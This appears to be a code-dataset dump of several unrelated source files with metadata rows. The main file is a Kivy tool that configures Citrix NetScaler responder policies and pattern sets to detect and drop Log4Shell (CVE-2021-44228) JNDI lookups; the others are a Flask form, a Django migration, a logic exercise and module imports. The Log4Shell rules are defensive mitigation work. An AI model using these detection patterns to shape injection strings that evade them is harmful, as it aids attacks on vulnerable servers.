| 33.848485 | 97 | 0.753805 | 249 | 2,234 | 6.60241 | 0.253012 | 0.109489 | 0.131387 | 0.175182 | 0.511557 | 0.439173 | 0.377737 | 0.354015 | 0.30292 | 0.30292 | 0 | 0.018898 | 0.147269 | 2,234 | 65 | 98 | 34.369231 | 0.844094 | 0.444494 | 0 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7808aa807482efcb2b33550066adb7bf10e5f879 | 20,567 | py | Python | main.py | LooseDevGoose/Turbo_Log4J_ADC | dd6395643aa0f23a42f8e4309ac62114ca3adfcd | [
"Unlicense"
] | null | null | null | main.py | LooseDevGoose/Turbo_Log4J_ADC | dd6395643aa0f23a42f8e4309ac62114ca3adfcd | [
"Unlicense"
] | 4 | 2021-12-13T11:31:12.000Z | 2021-12-14T15:00:37.000Z | main.py | LooseDevGoose/Turbo_Log4J_ADC | dd6395643aa0f23a42f8e4309ac62114ca3adfcd | [
"Unlicense"
] | null | null | null | #Screen functionality gets sent to different files e.g. ADCTK_ReportFunctionality or ADCTK_SecurityScan
#When functionality is done, data gets fed back to the screen and shown to user
#Please mind that the draw time of the screen impacts what is shown, as it does not update dynamically
###############
####Imports####
###############
#Import Kivy libraries
from kivymd.app import MDApp
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager,Screen
from kivy.core.window import Window
#Import List Libraries
from kivymd.uix.list import IRightBodyTouch, OneLineAvatarIconListItem
from kivymd.uix.selectioncontrol import MDCheckbox
from kivy.properties import StringProperty
#Libraries from Netscaler Nitro API
from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
from nssrc.com.citrix.netscaler.nitro.resource.config.audit import auditsyslogparams
from nssrc.com.citrix.netscaler.nitro.resource.config.audit import auditnslogparams
from nssrc.com.citrix.netscaler.nitro.resource.config.audit import auditmessageaction
from nssrc.com.citrix.netscaler.nitro.resource.config.responder import responderpolicy
from nssrc.com.citrix.netscaler.nitro.resource.config.responder import responderglobal_responderpolicy_binding
from nssrc.com.citrix.netscaler.nitro.resource.config.appfw import appfwpolicy
from nssrc.com.citrix.netscaler.nitro.resource.config.appfw import appfwglobal_appfwpolicy_binding
from nssrc.com.citrix.netscaler.nitro.resource.config.policy import policypatset
from nssrc.com.citrix.netscaler.nitro.resource.config.policy import policypatset_pattern_binding
#Window Manager, managed and creates windows via KV file
class WindowManager(ScreenManager):
pass
#Define CustomListItem for SSL login option
class ListItemWithCheckbox(OneLineAvatarIconListItem):
'''Custom list item.'''
icon = StringProperty("security-network")
class RightCheckbox(IRightBodyTouch, MDCheckbox):
'''Custom right container.'''
class LoginScreen(Screen):
def submitinfo(self):
global nsip
global nsusername
nsip = self.ids.ns_ip.text
nsusername = self.ids.ns_username.text
nspassword = self.ids.ns_password.text
try:
global ns_session
if self.ids.https_box.ids.cb.active == True:
protocol = "https"
else:
protocol = "http"
ns_session = nitro_service(f"{nsip}", f"{protocol}")
ns_session.login(f"{nsusername}", f"{nspassword}", 3600)
return (ns_session.isLogin())
except Exception as error:
errormessage = ("Error: " + str(error.args))
self.ids.error_label_login.text = errormessage
def cleardata(self):
self.ids.ns_ip.text = ("")
self.ids.ns_username.text = ("")
self.ids.ns_password.text = ("")
class MainMenu(Screen):
def MadsRegex(self):
try:
#Set audit syslogparams to YES
syslog_params = auditsyslogparams.auditsyslogparams()
syslog_params.userdefinedauditlog = "YES"
syslog_params.update(ns_session, syslog_params)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
#Set audit nslogparams to YES
nslog_params = auditnslogparams.auditnslogparams()
nslog_params.userdefinedauditlog = "YES"
nslog_params.update(ns_session, nslog_params)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
#Create Audit Message action #1
audit_message_action1 = auditmessageaction.auditmessageaction()
audit_message_action1.name = "Log4Shell_URL_log"
audit_message_action1.loglevel = "ALERT"
audit_message_action1.logtonewnslog = "YES"
audit_message_action1.stringbuilderexpr = "\"Log4Shell cve-2021-44228 URL match - Client IP=\"+ CLIENT.IP.SRC + \"; REQ Host=\"+ HTTP.REQ.HOSTNAME+ \"; REQ URL=\"+ HTTP.REQ.URL.DECODE_USING_TEXT_MODE + \" ; REQ HEADERS=\"+ HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE"
audit_message_action1.add(ns_session, audit_message_action1)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
audit_message_action2 = auditmessageaction.auditmessageaction()
audit_message_action2.name = "Log4Shell_Headers_log"
audit_message_action2.loglevel = "ALERT"
audit_message_action2.logtonewnslog = "YES"
audit_message_action2.stringbuilderexpr = "\"Log4Shell cve-2021-44228 HEADER match - Client IP=\"+ CLIENT.IP.SRC + \"; REQ Host=\"+ HTTP.REQ.HOSTNAME+ \"; REQ URL=\"+ HTTP.REQ.URL.DECODE_USING_TEXT_MODE + \" ; REQ HEADERS=\"+ HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE"
audit_message_action2.add(ns_session, audit_message_action2)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
#Create Responder policy GLOVR_RSP_POL_Log4Shell_Headers
responderpolicy1 = responderpolicy.responderpolicy()
responderpolicy1.name = "GLOVR_RSP_POL_Log4Shell_Headers"
responderpolicy1.action = "DROP"
responderpolicy1.rule = "HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE.REGEX_MATCH(re#\\$\\{+\?(.*\?:|.*\?:.*-)\?[jJlLnNdDiIaApPsSmMrRoOhH}:]*//#)"
responderpolicy1.logaction = "Log4Shell_Headers_log"
responderpolicy1.add(ns_session, responderpolicy1)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
# Create Responder policy GLOVR_RSP_POL_Log4Shell_Headers
responderpolicy2 = responderpolicy.responderpolicy()
responderpolicy2.name = "GLOVR_RSP_POL_Log4Shell_URL"
responderpolicy2.action = "DROP"
responderpolicy2.rule = "HTTP.REQ.URL.PATH_AND_QUERY.DECODE_USING_TEXT_MODE.REGEX_MATCH(re#\\$\\{+\?(.*\?:|.*\?:.*-)\?[jJlLnNdDiIaApPsSmMrRoOhH}:]*//#)"
responderpolicy2.logaction = "Log4Shell_URL_log"
responderpolicy2.add(ns_session, responderpolicy2)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
bind_responderpolicy1_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy1_global.policyname = "GLOVR_RSP_POL_Log4Shell_Headers"
bind_responderpolicy1_global.priority = "90"
bind_responderpolicy1_global.type = "REQ_OVERRIDE"
bind_responderpolicy1_global.add(ns_session, bind_responderpolicy1_global)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
bind_responderpolicy2_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy2_global.policyname = "GLOVR_RSP_POL_Log4Shell_URL"
bind_responderpolicy2_global.priority = "100"
bind_responderpolicy2_global.type = "REQ_OVERRIDE"
bind_responderpolicy2_global.add(ns_session, bind_responderpolicy2_global)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
def MadsRegexPurge(self):
i = 0
while i < 6:
i+= 1
try:
# Set audit syslogparams to No
syslog_params = auditsyslogparams.auditsyslogparams()
syslog_params.userdefinedauditlog = "NO"
syslog_params.update(ns_session, syslog_params)
except Exception as error:
errormessage = ("Error1: " + str(error.args))
print(errormessage)
try:
# Set audit nslogparams to No
nslog_params = auditnslogparams.auditnslogparams()
nslog_params.userdefinedauditlog = "NO"
nslog_params.update(ns_session, nslog_params)
except Exception as error:
errormessage = ("Error2: " + str(error.args))
print(errormessage)
#Remove Global Bindings
try:
bind_responderpolicy1_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy1_global.policyname = "GLOVR_RSP_POL_Log4Shell_Headers"
if bind_responderpolicy1_global.globalbindtype != "":
bind_responderpolicy1_global.globalbindtype = ""
bind_responderpolicy1_global.delete(ns_session, bind_responderpolicy1_global)
except Exception as error:
errormessage = ("Error3: global policies1 " + str(error.args))
print(errormessage)
try:
bind_responderpolicy2_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy2_global.policyname = "GLOVR_RSP_POL_Log4Shell_URL"
if bind_responderpolicy2_global.globalbindtype != '':
print(bind_responderpolicy2_global.globalbindtype)
bind_responderpolicy2_global.globalbindtype = ''
bind_responderpolicy2_global.delete(ns_session, bind_responderpolicy2_global)
except Exception as error:
errormessage = ("Error4: global policies2 " + str(error.args))
print(errormessage)
try:
audit_message_action1 = auditmessageaction.auditmessageaction()
audit_message_action1.name = "Log4Shell_URL_log"
audit_message_action1.unset = "Log4Shell_URL_log"
audit_message_action1.delete(ns_session, audit_message_action1)
except Exception as error:
errormessage = ("Error5: " + str(error.args))
print(errormessage)
try:
audit_message_action2 = auditmessageaction.auditmessageaction()
audit_message_action2.name = "Log4Shell_Headers_log"
audit_message_action2.unset = "Log4Shell_Headers_log"
audit_message_action2.delete(ns_session, audit_message_action2)
except Exception as error:
errormessage = ("Error6: " + str(error.args))
print(errormessage)
        #Remove Responder policies but remove logaction first
try:
responderpolicy1 = responderpolicy.responderpolicy()
responderpolicy1.name = "GLOVR_RSP_POL_Log4Shell_Headers"
responderpolicy1.logaction = "None"
responderpolicy1.unset = "GLOVR_RSP_POL_Log4Shell_Headers"
responderpolicy1.delete(ns_session, responderpolicy1)
except Exception as error:
errormessage = ("Error7: " + str(error.args))
print(errormessage)
try:
responderpolicy2 = responderpolicy.responderpolicy()
responderpolicy2.name = "GLOVR_RSP_POL_Log4Shell_URL"
responderpolicy2.logaction = "None"
responderpolicy2.unset = "GLOVR_RSP_POL_Log4Shell_URL"
responderpolicy2.delete(ns_session, responderpolicy2)
except Exception as error:
errormessage = ("Error8: " + str(error.args))
print(errormessage)
def Enable_IP_Reputation(self):
features_to_be_enabled = ['Rep', 'appfw']
ns_session.enable_features(features_to_be_enabled)
try:
custom_appfw_pol = appfwpolicy.appfwpolicy()
custom_appfw_pol.name = "Turbo_ADC_Custom_APPFW"
custom_appfw_pol.profilename = "APPFW_BLOCK"
custom_appfw_pol.rule = "CLIENT.IP.SRC.IPREP_IS_MALICIOUS"
custom_appfw_pol.add(ns_session, custom_appfw_pol)
except Exception as error:
            errormessage = ("Error appfw1: " + str(error.args))
            print(errormessage)
try:
bind_appfw_global = appfwglobal_appfwpolicy_binding.appfwglobal_appfwpolicy_binding()
bind_appfw_global.policyname = "Turbo_ADC_Custom_APPFW"
bind_appfw_global.state = "ENABLED"
bind_appfw_global.type = "REQ_OVERRIDE"
bind_appfw_global.priority = "110"
bind_appfw_global.add(ns_session, bind_appfw_global)
except Exception as error:
errormessage = ("Error appfw2: " + str(error.args))
print(errormessage)
def Disable_IP_Reputation(self):
#features_to_be_disabled = ['Rep']
#ns_session.disable_features(features_to_be_disabled)
try:
bind_appfw_global = appfwglobal_appfwpolicy_binding.appfwglobal_appfwpolicy_binding()
bind_appfw_global.policyname = "Turbo_ADC_Custom_APPFW"
bind_appfw_global.state = "DISABLED"
bind_appfw_global.delete(ns_session, bind_appfw_global)
except Exception as error:
errormessage = ("Error appfw2: " + str(error.args))
print(errormessage)
try:
custom_appfw_pol = appfwpolicy.appfwpolicy()
custom_appfw_pol.name = "Turbo_ADC_Custom_APPFW"
custom_appfw_pol.delete(ns_session, custom_appfw_pol)
except Exception as error:
            errormessage = ("Error appfw1: " + str(error.args))
            print(errormessage)
def Citrix_Responder_Enable(self):
try:
#Creates Policy for Patset per https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/
policy = policypatset.policypatset()
policy.name = "patset_cve_2021_44228"
policy.add(ns_session, policy)
print("done1")
except Exception as error:
errormessage = ("Error citrix1: " + str(error.args))
print(errormessage)
try:
patternset_protocol = policypatset_pattern_binding.policypatset_pattern_binding()
patternset_protocol.name = "patset_cve_2021_44228"
patternset_protocol.String = "ldap"
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'http'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'https'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'ldaps'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'rmi'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'dns'
patternset_protocol.add(ns_session, patternset_protocol)
except Exception as error:
errormessage = ("Error citrix2: " + str(error.args))
print(errormessage)
try:
#Create Responder policy based on patsets
responder = responderpolicy.responderpolicy()
responder.name = 'mitigate_cve_2021_44228'
responder.rule = "HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE. SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\")"
responder.action = "DROP"
responder.add(ns_session, responder)
except Exception as error:
errormessage = ("Error citrix3: " + str(error.args))
print(errormessage)
try:
#Bind Responder policy globally
bind_responderpolicy_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy_global.policyname = "mitigate_cve_2021_44228"
bind_responderpolicy_global.priority = "120"
bind_responderpolicy_global.type = "REQ_OVERRIDE"
bind_responderpolicy_global.add(ns_session, bind_responderpolicy_global)
except Exception as error:
errormessage = ("Error citrix4: " + str(error.args))
print(errormessage)
def Citrix_Responder_Purge(self):
try:
#Bind Responder policy globally
bind_responderpolicy_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy_global.policyname = "mitigate_cve_2021_44228"
if bind_responderpolicy_global.globalbindtype != '':
print(bind_responderpolicy_global.globalbindtype)
bind_responderpolicy_global.globalbindtype = ''
bind_responderpolicy_global.delete(ns_session, bind_responderpolicy_global)
except Exception as error:
errormessage = ("Error citrix4: " + str(error.args))
print(errormessage)
try:
#Create Responder policy based on patsets
responder = responderpolicy.responderpolicy()
responder.name = 'mitigate_cve_2021_44228'
responder.delete(ns_session, responder)
except Exception as error:
errormessage = ("Error citrix4: " + str(error.args))
print(errormessage)
try:
patternset_protocol = policypatset_pattern_binding.policypatset_pattern_binding()
patternset_protocol.name = "patset_cve_2021_44228"
patternset_protocol.String = "ldap"
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'http'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'https'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'ldaps'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'rmi'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'dns'
patternset_protocol.delete(ns_session, patternset_protocol)
except Exception as error:
errormessage = ("Error citrix2: " + str(error.args))
print(errormessage)
try:
#Creates Policy for Patset per https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/
policy = policypatset.policypatset()
policy.name = "patset_cve_2021_44228"
policy.delete(ns_session, policy)
except Exception as error:
errormessage = ("Error citrix1: " + str(error.args))
print(errormessage)
def Save_NS_Config(self):
ns_session.save_config()
def Logout_NS_Session(self):
ns_session.logout()
#Build Class for Login Screen inc. Theme data
class Log4j_ADC(MDApp):
def build(self):
#Window.size = (1200, 800)
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "Blue"
self.theme_cls.hue = 700
self.title = "Turbo_Log4j_ADC 1.1"
self.icon = "Images/Logo.png"
        return Builder.load_file('Log4j_ADC.kv')
def change_screen(self, screen: str):
self.root.current = screen
Log4j_ADC().run()
| 45.908482 | 647 | 0.648904 | 2,026 | 20,567 | 6.319348 | 0.155972 | 0.033039 | 0.038507 | 0.049832 | 0.755995 | 0.721472 | 0.691166 | 0.640162 | 0.614622 | 0.603687 | 0 | 0.019153 | 0.266349 | 20,567 | 447 | 648 | 46.011186 | 0.829346 | 0.069091 | 0 | 0.559271 | 0 | 0.00304 | 0.128443 | 0.077807 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036474 | false | 0.012158 | 0.051672 | 0 | 0.112462 | 0.088146 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
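The responder policies in the file above match `${...}` JNDI lookups (ldap, ldaps, rmi, dns, http, https) in request headers and URLs. As a plain-Python illustration of that matching idea only — this is not the NetScaler policy expression, and the regex here is a simplified sketch:

```python
import re

# Simplified pattern in the spirit of the responder rules above:
# flag text containing a "${ ... jndi ... <scheme>" lookup.
LOG4SHELL_RE = re.compile(
    r"\$\{.*?jndi.*?(ldap|ldaps|rmi|dns|http|https)", re.IGNORECASE
)


def looks_like_log4shell(text):
    # Return True when the text resembles a CVE-2021-44228 payload.
    return bool(LOG4SHELL_RE.search(text))


print(looks_like_log4shell("${jndi:ldap://evil.example/a}"))  # -> True
print(looks_like_log4shell("GET /index.html HTTP/1.1"))       # -> False
```

Real payloads use many obfuscations (nested lookups, case tricks, URL encoding), which is why the original rules decode the request text before matching.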
7814e99f909d6640a1a4c8aab5785638dbac2bfc | 379 | py | Python | app/forms.py | dairvin9/AnimalStyle | 33d322a5f5c839091ee58c04cacfc5c894dc168c | [
"CC-BY-3.0"
] | null | null | null | app/forms.py | dairvin9/AnimalStyle | 33d322a5f5c839091ee58c04cacfc5c894dc168c | [
"CC-BY-3.0"
] | null | null | null | app/forms.py | dairvin9/AnimalStyle | 33d322a5f5c839091ee58c04cacfc5c894dc168c | [
"CC-BY-3.0"
] | null | null | null | from flask_wtf import Form
from wtforms import StringField, BooleanField, ValidationError
from wtforms.validators import DataRequired
from wtforms.widgets import TextArea
# validators.length(max=10)]
class CommentForm(Form):
username = StringField('username', validators=[DataRequired()])
comment = StringField('comment', validators=[DataRequired()],widget=TextArea()) | 34.454545 | 83 | 0.791557 | 40 | 379 | 7.475 | 0.525 | 0.110368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0059 | 0.105541 | 379 | 11 | 83 | 34.454545 | 0.876106 | 0.068602 | 0 | 0 | 0 | 0 | 0.042614 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
781b5029a1b0c8a541cf86d413ebce20c9e3b485 | 1,330 | py | Python | server/migrations/0043_auto_20160809_2122.py | lfaraone/sal | d0dff90cebcbc87f18c2c6957264f21566d52000 | [
"Apache-2.0"
] | 2 | 2019-11-01T20:50:35.000Z | 2021-01-13T22:02:55.000Z | server/migrations/0043_auto_20160809_2122.py | grahamgilbert/sal | d247ec1ea8855e65e5855b0dd63eae93b40f86ca | [
"Apache-2.0"
] | null | null | null | server/migrations/0043_auto_20160809_2122.py | grahamgilbert/sal | d247ec1ea8855e65e5855b0dd63eae93b40f86ca | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-10 04:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0042_auto_20160808_1021'),
]
operations = [
migrations.RemoveField(
model_name='osquerycolumn',
name='osquery_result',
),
migrations.RemoveField(
model_name='osqueryresult',
name='machine',
),
migrations.AlterField(
model_name='condition',
name='condition_data',
field=models.TextField(db_index=True),
),
migrations.AlterField(
model_name='condition',
name='condition_name',
field=models.CharField(db_index=True, max_length=255),
),
migrations.AlterField(
model_name='fact',
name='fact_data',
field=models.TextField(db_index=True),
),
migrations.AlterField(
model_name='fact',
name='fact_name',
field=models.TextField(db_index=True),
),
migrations.DeleteModel(
name='OSQueryColumn',
),
migrations.DeleteModel(
name='OSQueryResult',
),
]
| 26.6 | 66 | 0.556391 | 118 | 1,330 | 6.067797 | 0.432203 | 0.075419 | 0.139665 | 0.162011 | 0.412011 | 0.412011 | 0.412011 | 0.178771 | 0.178771 | 0.178771 | 0 | 0.039414 | 0.332331 | 1,330 | 49 | 67 | 27.142857 | 0.766892 | 0.049624 | 0 | 0.547619 | 1 | 0 | 0.137986 | 0.018239 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
781de63e49673dee4a44df9891c8685afa780f2f | 705 | py | Python | naturtag/widgets/__init__.py | JWCook/inat-image-tagger | 2ba48ec849517b32cee1bfe9527f838a4f22cd94 | [
"MIT"
] | 1 | 2020-05-10T23:17:07.000Z | 2020-05-10T23:17:07.000Z | naturtag/widgets/__init__.py | JWCook/inat-image-tagger | 2ba48ec849517b32cee1bfe9527f838a4f22cd94 | [
"MIT"
] | 13 | 2020-05-23T14:56:39.000Z | 2020-05-24T03:35:21.000Z | naturtag/widgets/__init__.py | JWCook/inat-image-tagger | 2ba48ec849517b32cee1bfe9527f838a4f22cd94 | [
"MIT"
] | null | null | null | # flake8: noqa: F401
# isort: skip_file
from naturtag.widgets.layouts import (
FlowLayout,
GridLayout,
HorizontalLayout,
StylableWidget,
VerticalLayout,
)
from naturtag.widgets.autocomplete import TaxonAutocomplete
from naturtag.widgets.images import (
FullscreenPhoto,
HoverIcon,
HoverLabel,
IconLabel,
ImageWindow,
PixmapLabel,
)
from naturtag.widgets.inputs import IdInput
from naturtag.widgets.logger import QtRichHandler, init_handler
from naturtag.widgets.taxon_images import (
FullscreenTaxonPhoto,
HoverTaxonPhoto,
TaxonImageWindow,
TaxonInfoCard,
TaxonList,
TaxonPhoto,
)
from naturtag.widgets.toggle_switch import ToggleSwitch
| 23.5 | 63 | 0.763121 | 66 | 705 | 8.090909 | 0.621212 | 0.157303 | 0.249064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006885 | 0.175887 | 705 | 29 | 64 | 24.310345 | 0.91222 | 0.049645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.259259 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78234bcd26c7457083d86963328b249aac88507f | 795 | py | Python | tp4/tp4.py | WISSAL-MN/python13 | 0abb96d9f1c87db7db1d90ebca3457ea50a8f9ff | [
"MIT"
] | 2 | 2022-03-17T11:27:21.000Z | 2022-03-18T18:20:04.000Z | tp4/tp4.py | WISSAL-MN/python13 | 0abb96d9f1c87db7db1d90ebca3457ea50a8f9ff | [
"MIT"
] | null | null | null | tp4/tp4.py | WISSAL-MN/python13 | 0abb96d9f1c87db7db1d90ebca3457ea50a8f9ff | [
"MIT"
] | null | null | null | from logic import *
agent=PropKB()
P11, P12, P21, P22, P31, B11, B21 = expr('P11, P12, P21, P22, P31, B11, B21')
agent.tell(~P11)
agent.tell(B11 | '<=>' | ((P12 | P21)))
agent.tell(B21 | '<=>' | ((P11 | P22 | P31)))
agent.tell(~B11)
agent.tell(B21)
#agent.ask_if_true(~P11)
#agent.ask_if_true(B11 | '<=>' | ((P12 | P21)))
#agent.ask_if_true(B21 | '<=>' | ((P11 | P22 | P31)))
#agent.ask_if_true(~B11)
#agent.ask_if_true(B21)
print(agent.ask_if_true(P12))
print(agent.ask_if_true(~P12))
print(agent.ask_if_true(P22))
print(agent.ask_if_true(~P22))
print(pl_resolution(agent, P12))
print(pl_resolution(agent, ~P12))
print(pl_resolution(agent, P22))
print(pl_resolution(agent, ~P22))
| 22.714286 | 78 | 0.612579 | 124 | 795 | 3.75 | 0.16129 | 0.154839 | 0.193548 | 0.270968 | 0.696774 | 0.434409 | 0.434409 | 0.290323 | 0.290323 | 0.135484 | 0 | 0.155689 | 0.159748 | 795 | 34 | 79 | 23.382353 | 0.540419 | 0.208805 | 0 | 0 | 0 | 0 | 0.076271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.32 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
782b6caf5a4de91a8a23894223eb006d6b1a0f80 | 369 | py | Python | startifact/parameters/__init__.py | cariad/startifact | ef0b855ca2061f9e6982ed28c63b3da4c5d1464d | [
"MIT"
] | null | null | null | startifact/parameters/__init__.py | cariad/startifact | ef0b855ca2061f9e6982ed28c63b3da4c5d1464d | [
"MIT"
] | 15 | 2021-11-09T13:22:57.000Z | 2021-12-17T12:24:27.000Z | startifact/parameters/__init__.py | cariad/startifact | ef0b855ca2061f9e6982ed28c63b3da4c5d1464d | [
"MIT"
] | null | null | null | from startifact.parameters.bucket import BucketParameter
from startifact.parameters.configuration import ConfigurationParameter
from startifact.parameters.latest_version import LatestVersionParameter
from startifact.parameters.parameter import Parameter
__all__ = [
"BucketParameter",
"ConfigurationParameter",
"LatestVersionParameter",
"Parameter",
]
| 30.75 | 71 | 0.826558 | 30 | 369 | 10 | 0.433333 | 0.186667 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 369 | 11 | 72 | 33.545455 | 0.914634 | 0 | 0 | 0 | 0 | 0 | 0.184282 | 0.119241 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
78437b78c7a6f9630875269c9c1bd77b0705e4c4 | 27,459 | py | Python | genomics_data_index/api/query/SamplesQuery.py | apetkau/thesis-index | 6c96e9ed75d8e661437effe62a939727a0b473fc | [
"Apache-2.0"
] | 1 | 2021-04-21T00:19:49.000Z | 2021-04-21T00:19:49.000Z | genomics_data_index/api/query/SamplesQuery.py | apetkau/thesis-index | 6c96e9ed75d8e661437effe62a939727a0b473fc | [
"Apache-2.0"
] | null | null | null | genomics_data_index/api/query/SamplesQuery.py | apetkau/thesis-index | 6c96e9ed75d8e661437effe62a939727a0b473fc | [
"Apache-2.0"
] | null | null | null | from __future__ import annotations
import abc
from typing import Union, List, Set, Tuple
import numpy as np
import pandas as pd
from ete3 import Tree
from genomics_data_index.api.query.kind.IsaKind import IsaKind
from genomics_data_index.storage.SampleSet import SampleSet
from genomics_data_index.storage.model.QueryFeature import QueryFeature
class SamplesQuery(abc.ABC):
"""
The base class for queries related to samples. The different query methods in a SamplesQuery
operate on a set of samples (specifically a set of Sample identifiers,
see :py:class:`genomics_data_index.storage.SampleSet`) and return a new SamplesQuery consisting of the
subset of samples matching the defined criteria.
That is to say, if A = SamplesQuery(), then B = A.method() will consist of a subset of A matching the criteria
defined by A.method().
Multiple subtypes of SamplesQuery exist which may provide access to data joined to a set of Samples for
implementing different queries (e.g., a :py:class:`genomics_data_index.api.query.impl.TreeSamplesQuery` provides
a tree joined to a SampleSet and methods to query based on the tree).
"""
ALL_SAMPLES = SampleSet.create_all()
def __init__(self):
pass
@property
@abc.abstractmethod
def universe_set(self) -> SampleSet:
"""
The set of samples :py:class:`genomics_data_index.storage.SampleSet` defining the universe under consideration
for this SamplesQuery. Useful for e.g., complement() functionality.
